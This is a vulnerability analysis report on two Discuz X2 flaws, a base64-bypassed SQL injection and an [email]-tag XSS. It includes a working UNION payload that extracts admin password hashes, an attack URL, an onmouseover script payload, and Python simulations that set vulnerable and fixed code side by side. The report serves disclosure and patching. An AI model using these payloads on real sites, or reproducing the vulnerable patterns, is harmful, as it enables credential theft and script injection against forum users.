Discuz X2 security research report: 0-day analysis of SQL injection and XSS vulnerabilities (Nevel Security Team)


Two 0-day vulnerabilities in Discuz X2 were recently disclosed. The first is a SQL injection vulnerability that lets an attacker read user names and password hashes out of the database; the second is an XSS vulnerability that an attacker can use to plant a website Trojan (drive-by download), run phishing pages and similar attacks. The official 0629 release fixes both issues. What follows is the Nevel Security Team (imiyoo) analysis report on the two Discuz X2 0-days.

SQL injection problem description:

SQL injection is an attack on the database behind an application. The attacker supplies malformed input; if the application does not filter it adequately, the database ends up executing statements the programmer never intended, leading to data leakage, server compromise and a whole series of further problems. Severity: high.

Analysis Report:

The root cause is in source/module/forum/forum_attachment.php. The relevant code is as follows:

$_G['gp_aid'] is built from the user-submitted aid parameter. The program runs aid through base64_decode() and then uses the result in the SQL query, with no validation between the decode and the query. Because Discuz's SQL attack detection inspects the raw request parameters, base64 encoding gives the attacker a way past it: the detector sees only harmless base64 text, while the query sees the decoded SQL. The result is a SQL injection vulnerability.

Constructing the SQL exploit:

mod=attachment        // the file containing the vulnerability
findpost=imiyoo       // any non-empty value, so that $_G['gp_findpost'] is set and the program enters the vulnerable SQL query path
aid=base64_encode("1 and 1=2 union all select 1,concat(username,0x7C,password) from pre_common_member where username like admin | Nevel")

The statement is a UNION that exposes the user name and password from pre_common_member (0x7C is the ASCII '|' used as the separator inside concat()). Four '|' characters are appended to the statement so that, after base64_decode(), splitting on '|' still yields the five variables the program expects.

The complete attack URL is:

http://www.bkjia.com/forum.php?mod=attachment&findpost=imiyoo&aid=[the base64-encoded payload constructed above]
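The following Python program is an added example, not code from Discuz or from the Nevel report. It reproduces the pattern the report describes in a self-contained SQLite database so the bypass can be watched end to end: the request-level keyword filter, the table layout and the member rows are constructed for this example, and the UNION payload is adapted to SQLite syntax (it selects username and password as two columns, matching the two columns of the original query, instead of packing them with MySQL's concat(..., 0x7C, ...)).

```python
import base64
import re
import sqlite3

# Constructed sample rows standing in for Discuz's pre_common_member table
# (the hashes are md5("admin") and md5("123456"), chosen for the example).
SAMPLE_MEMBERS = [
    (1, "admin", "21232f297a57a5a743894a0e4a801fc3"),
    (2, "alice", "e10adc3949ba59abbe56e057f20f883e"),
]

# Assumed stand-in for the "SQL attack detection" the report says Discuz runs
# over raw request parameters; the real filter is not shown in the report.
SQLI_KEYWORDS = re.compile(r"union\s+(all\s+)?select", re.IGNORECASE)


def request_filter_blocks(params):
    """True if any raw (still encoded) parameter value trips the keyword filter."""
    return any(SQLI_KEYWORDS.search(value) for value in params.values())


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pre_common_member (uid INTEGER, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE pre_forum_attachment (aid INTEGER, filename TEXT)")
    conn.executemany("INSERT INTO pre_common_member VALUES (?, ?, ?)", SAMPLE_MEMBERS)
    conn.execute("INSERT INTO pre_forum_attachment VALUES (1, 'photo.jpg')")
    return conn


def encode_aid(aid, *rest):
    """A legitimate token in the five-field shape: aid plus four more '|'-separated fields."""
    fields = [str(aid), *rest]
    fields += [""] * (5 - len(fields))
    return base64.b64encode("|".join(fields).encode()).decode()


def decode_aid(raw_aid):
    """The pattern the report describes: aid is base64-decoded and split on '|'
    into five fields, and only the first field is used as the attachment id."""
    return base64.b64decode(raw_aid).decode().split("|")[0]


def vulnerable_lookup(conn, params):
    """Filter runs on the raw base64 value, then the decoded aid is interpolated
    straight into SQL: the flaw described for forum_attachment.php."""
    if request_filter_blocks(params):
        return "blocked"
    if not params.get("findpost"):        # findpost must be non-empty to reach the query
        return []
    aid = decode_aid(params["aid"])
    sql = f"SELECT aid, filename FROM pre_forum_attachment WHERE aid={aid}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, params):
    """Hardened form: coerce the decoded aid to an integer (intval-style) and bind it."""
    if not params.get("findpost"):
        return []
    field = decode_aid(params["aid"])
    aid = int(field) if field.isdigit() else 0
    return conn.execute(
        "SELECT aid, filename FROM pre_forum_attachment WHERE aid=?", (aid,)
    ).fetchall()


def exploit_payload():
    """Payload in the shape the report gives, adapted to SQLite. The fragment must
    contain no literal '|' because the decoded aid is split on '|' (which is why the
    report's payload uses 0x7C inside concat() instead of a pipe character); four '|'
    are appended so the split still yields five fields."""
    fragment = ("1 and 1=2 union all select username, password "
                "from pre_common_member where username like 'admin'")
    return base64.b64encode((fragment + "||||").encode()).decode()


if __name__ == "__main__":
    db = build_db()
    raw = {"findpost": "imiyoo", "aid": "1 union select 1,2"}
    print("raw injection:   ", vulnerable_lookup(db, raw))        # caught by the filter
    encoded = {"findpost": "imiyoo", "aid": exploit_payload()}
    print("base64 injection:", vulnerable_lookup(db, encoded))    # admin hash leaks
    print("bound parameter: ", safe_lookup(db, encoded))          # nothing leaks
    print("legitimate token:", safe_lookup(db, {"findpost": "x", "aid": encode_aid(1)}))
```

The filter never sees the word "union" because base64 output contains no whitespace or SQL keywords, which is the whole point of the bypass; the durable fix is not a better keyword list but treating the decoded field as an integer and binding it, as safe_lookup() does.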

Attack effect: (shown in the original report)

XSS problem description:

XSS (cross-site scripting) is a client-side attack. The attacker inserts malicious HTML into a web page; when a user views that page, the embedded HTML (and any script it carries) runs in the user's browser, which lets the attacker act against that user for whatever purpose. With this XSS vulnerability an attacker can (1) plant a website Trojan, (2) phish users and (3) mount CSRF attacks. Severity: moderate.

Analysis Report:

The root cause is in source/function/function_discuzcode.php. In the discuzcode() function the [email]...[/email] markup entered by the user is rewritten with preg_replace(), which hands the matched text to parseemail(). The problem is in that handoff: when the user's text contains special characters such as double quotation marks, preg_replace() backslash-escapes them before substituting the match into the replacement expression (this is the documented behaviour of its /e modifier), and parseemail() then outputs the escaped string without filtering it.

The parseemail function is as follows:

The $text variable is output to the client directly, without filtering, which produces the XSS vulnerability.

Constructing the XSS exploit:

[email][url]"http://www.imiyoo.com onmouseover=alert(/Discuz-XSS-Exploit/);"[/url][/email]

Vulnerability repair:

When the malicious data above passes through preg_replace(), the double quotation marks are escaped (\") and then output as part of the string. In the resulting HTML the quotation mark still terminates the attribute value it lands in, so the text that follows it (onmouseover=...) becomes an attribute of its own and the XSS fires, for example (shown in the original report):

The fix is therefore to post-process the variable that preg_replace() hands over: strip the escape characters it added and convert (HTML-encode) the result before output, so that a quotation mark can no longer close the attribute.
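The following Python simulation is an added example, not code from Discuz or from the Nevel report. It models the chain described above: the backslash escaping that preg_replace()'s /e modifier applies to the captured text, a parseemail() stand-in that echoes that text into an anchor unfiltered (the exact anchor shape is an assumption; any attribute built from the text fails the same way), and a minimal attribute tokenizer that shows which attributes a browser would end up with. The fixed variant applies the repair recommended above: strip the escape characters, then HTML-encode before output.

```python
import html
import re

# The report's payload, posted inside an [email] tag (constructed input).
PAYLOAD = ('[email][url]"http://www.imiyoo.com onmouseover=alert(/Discuz-XSS-Exploit/);"'
           '[/url][/email]')

EMAIL_TAG = re.compile(r"\[email\](.+?)\[/email\]", re.IGNORECASE | re.DOTALL)


def e_modifier_escape(captured):
    """What PHP's preg_replace() /e modifier does to a backreference before it is
    substituted into the evaluated replacement: ' " \\ and NUL get a backslash.
    Modelled explicitly here because Python's re.sub() does nothing of the kind."""
    return (captured.replace("\\", "\\\\").replace("'", "\\'")
            .replace('"', '\\"').replace("\0", "\\0"))


def parseemail_vulnerable(text):
    """The behaviour the report describes: $text is emitted without filtering."""
    return f'<a href="mailto:{text}">{text}</a>'


def parseemail_fixed(text):
    """The repair: remove the backslashes /e added, then HTML-encode the value."""
    text = text.replace('\\"', '"').replace("\\'", "'").replace("\\\\", "\\")
    safe = html.escape(text, quote=True)
    return f'<a href="mailto:{safe}">{safe}</a>'


def discuzcode(message, parseemail):
    """Stand-in for the [email] branch of discuzcode(): a regex callback that
    receives the /e-escaped capture, like the PHP /ies replacement does."""
    return EMAIL_TAG.sub(lambda m: parseemail(e_modifier_escape(m.group(1))), message)


def attribute_names(start_tag):
    """Attribute names a browser tokenizer would see in one start tag: a quoted
    value runs to its matching quote, an unquoted one to the next whitespace."""
    body = start_tag[start_tag.index(" ") + 1:start_tag.rindex(">")]
    names, i = [], 0
    while i < len(body):
        if body[i].isspace():
            i += 1
            continue
        start = i
        while i < len(body) and not body[i].isspace() and body[i] != "=":
            i += 1
        names.append(body[start:i].lower())
        if i < len(body) and body[i] == "=":
            i += 1
            if i < len(body) and body[i] in "\"'":
                end = body.find(body[i], i + 1)
                i = len(body) if end < 0 else end + 1
            else:
                while i < len(body) and not body[i].isspace():
                    i += 1
    return names


def injected_handlers(rendered):
    """Event-handler attributes (on*) the browser would attach to the first tag."""
    tag = rendered[:rendered.index(">") + 1]
    return [name for name in attribute_names(tag) if name.startswith("on")]


if __name__ == "__main__":
    vulnerable = discuzcode(PAYLOAD, parseemail_vulnerable)
    print(vulnerable)
    print("handlers (vulnerable):", injected_handlers(vulnerable))   # ['onmouseover']
    fixed = discuzcode(PAYLOAD, parseemail_fixed)
    print(fixed)
    print("handlers (fixed):", injected_handlers(fixed))             # []
```

In the vulnerable output the href value ends at the \" that preg_replace() produced (the backslash is just a character inside the attribute, it does not protect the quote), so onmouseover=alert(...) becomes a real event handler. In the fixed output the quote is &quot;, the whole payload stays inside the href value, and no handler attribute exists.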

Security suggestion: manually install the latest official version: http://www.discuz.net/thread-2168918-1-1.html

Source: Nevel Security Team. Author: imiyoo
